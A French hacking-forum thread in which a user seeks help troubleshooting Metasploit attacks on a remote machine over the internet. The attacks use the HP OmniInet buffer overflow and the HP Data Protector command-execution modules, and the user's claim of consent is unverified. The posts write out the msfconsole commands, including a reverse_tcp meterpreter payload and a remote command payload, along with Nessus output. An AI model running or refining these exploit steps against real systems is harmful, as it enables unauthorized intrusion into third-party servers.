Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 18-10-2012 06:10:01

alcastylez
N00b
Inscription : 18-10-2012
Messages : 3

Probleme Metasploit

Bonjours a tous, j'aurai besoin d'expliquation aux sujet de l'usage de metasploit sur internet (outside lan), jai decouvert quelques vulnerabilites sur certains systeme (notament avec l'exploit HP omnilnet.exe Opcode 20 Buffer overflow et  HP Data Protector 6 EXEC_CMD Remote Code Execution) mais  impossible d'obtenir une session avec la premiere exploit malgre le fait que le service n'est plus actif sur la machine cible apres l'exploit

pour la deuxieme exploit (HP Data Protector 6 EXEC_CMD Remote Code Execution) le scanner de vulnerabilite nessus a ete capable defectuer la commande  \windows\system32\ipconfig.exe sur la machine victime et m'afficher l'output, mais impossible d'effectuer une commande.donc je demande votre aide afin d'identifier quesque je fait mal, alors voila comment je procede


****************************************************************
ma config est :

-Backtrack 5 R3 sur VMware
-Ma machine backtrack a une ip interne static
-j'utillise un no-ip pour avoir un ip externe static (deja tester avec un payload executable donc fonctionnel)
-les ports son ouvert correctement car comme mentioner jai eseyer avec un payload executable encoder avec shikata_ga_nai et cela fonctionne parfaitement over internet

****************************************************************

J'exploit la vulnerabilite (HP omnilnet.exe Opcode 20 Buffer overflow) :

use exploit/windows/misc/hp_omniinet_4
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.X (ip static interne)
set rhost (ip externe de la victime)
exploit

a ce moment l'exploit ce lance , metasploit envoie le payload et revien imediatement a la console msf, et lorsque je recommence le scan avec nessus le service n'est plus actif...
****************************************************************
J'exploit la vulnerabilite (HP Data Protector 6 EXEC_CMD Remote Code Execution) :
exploit/linux/misc/hp_data_protector_cmd_exec
set payload cmd/unix/generic
set cmd \windows\system32\ipconfig.exe
set rhost (ip externe de la machine victime)
exploit

a ce moment metasploit envoie la commande mais ne renvoie rien dutout et me retourne a la msf console encore une fois, lorsque je souligne que nessus a pu executer cette meme commande et me retourner le resultat...
****************************************************************
Alors je demande votre aide afin d'identifier quesque je fait de mal.
Merci d'avance big_smile:D:D

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 18-10-2012 07:20:59

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Probleme Metasploit

Bonjour,

Tu t'attaques à ton propre réseau là ?

Dernière modification par Fuji (18-10-2012 07:36:32)

Hors Ligne

#3 18-10-2012 15:49:34

alcastylez
N00b
Inscription : 18-10-2012
Messages : 3

Re : Probleme Metasploit

Enfaite je suis programmeur analyste et je minteresse a la securite jai donc fait un exposer sur cela depuis peu et en reponse a sa, mon proffesseur ma demander deseyer de cracker son reseau (donc jai son accord) , je ne compte en aucun cas faire de dommage, je veu simplement avoir la satisfaction davoir aider mon prof, et peut-etre aussi avoir une meilleur recommandation  en sortant de lecole big_smile

Hors Ligne

#4 20-10-2012 07:16:33

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Probleme Metasploit

Le HP Data Protector est plutôt orienté pour des LANs d'entreprises, là où se confond des serveurs LAMP, MAIL, SBDG, des switchs, des routeurs, firewall, des dizaines d'ordinateur clients, etc... bref, il y a du monde on est donc loin du LAN domestique avec une Box et deux ou trois ordis.

Or, le HP Data Protector est ce qu'on appelle une baies de stockage de plusieurs To permettant de comme son nom l'indique de stocker des données issues des serveurs, et tu dis que t'arrives à l’atteindre depuis l’extérieur roll si c'est vraiment le cas, cela constitue déjà une faille de sécurité grave pire qu'une base de données.

Hors Ligne

#5 20-10-2012 17:22:20

alcastylez
N00b
Inscription : 18-10-2012
Messages : 3

Re : Probleme Metasploit

Et bien pour ce qui est de la premiere exploit (HP omnilnet.exe Opcode 20 Buffer overflow) quand je la lance le service plante donc si cela est bien du a l'exploit on peu logiquement affirmer que la faille peu etre exploiter via internet


et pour la 2iem nessus me transmet le rapport suivant :

Plugin Output
Nessus was able to exploit the vulnerability to execute the command
'\windows\system32\ipconfig.exe' on the remote host, which produced the following output :
------------------------------ snip ------------------------------

Windows IP Configuration


Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter Local Area Connection 2:

IP Address. . . . . . . . . . . . : X.X.X.62
Subnet Mask . . . . . . . . . . . : 255.255.X.X
Default Gateway . . . . . . . . . : X.X.X.1
0
------------------------------ snip ------------------------------

Il est donc evident que la 2iem exloit est totalement applicable depuis internet, or quand je lance

exploit/linux/misc/hp_data_protector_cmd_exec
set payload cmd/unix/generic
set target 0
set cmd \windows\system32\ipconfig.exe
set rhost (ip externe de la machine victime)
exploit

Waiting...
Sending our command...
Error in connection or socket.

(je mentionne aussi que jai egalement eseyer avec une multitude d'autre commande sans succes donc cela ne provient pas de la syntaxe de l'option CMD du payload :S)
Le fait de pouvoir lancer une commande tel que Ipconfig.exe a ma guise (sans nessus) me suffirait amplement comme preuve a mon proffesseur.Mais malgre tout mes essaie j'obtient toujours l'erreur
"Error in connection or socket".

Donc peut-etre quelqu'un aurait deja eu cette meme erreur ou saurait comment la regler, ou simplement saurait le procede qu'utillise nessus pour lancer la meme commande avec succes ?
votre aide serait vraiment aprecier.
Remercie d'avance

Dernière modification par alcastylez (22-10-2012 04:04:59)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
2 151 04-12-2016 21:54:52 par GreyBird
4 195 04-12-2016 16:20:59 par pwerrick
Problème reaver par Antho3674
4 306 15-11-2016 22:05:12 par kcdtv
3 343 14-08-2016 10:22:07 par MiscL
5 734 18-07-2016 23:13:58 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.022 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]